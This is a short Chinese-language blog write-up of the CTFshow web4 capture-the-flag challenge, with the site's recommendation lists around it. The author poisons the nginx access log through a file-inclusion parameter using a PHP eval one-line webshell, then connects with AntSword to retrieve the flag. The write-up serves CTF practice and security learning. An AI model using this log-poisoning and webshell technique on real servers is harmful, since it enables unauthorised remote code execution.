刷题之旅第24站,CTFshow web4

其他 2020-02-18 10:31:50 阅读次数: 0

感谢ctf show平台提供题目

老套路使用php伪协议已经不行了。
在这里插入图片描述

那么我们进行日志注入获取shell
输入一下默认目录，得到了日志文件

?url=/var/log/nginx/access.log

在这里插入图片描述写入一句话

<?php @eval($_POST['pass']);?>

在这里插入图片描述

使用burp进行一下改包，不然写入的一句话会被进行url编码。

在这里插入图片描述

打开AntSword工具，进行连接。

在这里插入图片描述

使用文件管理功能，找到flag文件。
在这里插入图片描述

原创文章不易，点个赞再走吧。
在这里插入图片描述

圆圈勾勒成指纹

发布了50 篇原创文章 · 获赞 12 · 访问量 1891

私信关注

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104351293

刷题之旅第24站,CTFshow web4

ctfshow—web—web4

刷题之旅第33站,CTFshow web12

刷题之旅第32站,CTFshow web11

刷题之旅第30站,CTFshow web10

刷题之旅第29站,CTFshow web9

刷题之旅第27站,CTFshow web7

刷题之旅第28站,CTFshow web8

刷题之旅第26站,CTFshow web6

刷题之旅第25站,CTFshow web5

刷题之旅第23站,CTFshow web3

刷题之旅第22站,CTFshow web2

刷题之旅第21站,CTFshow web1

刷题之旅第34站,CTFshow web14

Web web4

web4——bugku

web4

刷题之旅第5站，论剑场web23、web24、web25、web26

BugKuCTF WEB web4

刷题记录：[CISCN2019 总决赛 Day1 Web4]Laravel1

刷题之旅第4站，接头霸王

刷题之旅第9站,bugku-web4,bugku-flag在index里

刷题之旅第12站,CTFshow misc签到题

Bugku CTF web4（Web）

刷题之旅第20站,CTFshow misc49

刷题之旅第19站,CTFshow misc 6

刷题之旅第18站,CTFshow misc5

刷题之旅第17站,CTFshow misc3

刷题之旅第16站,CTFshow misc31

刷题之旅第14站,CTFshow miscx

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)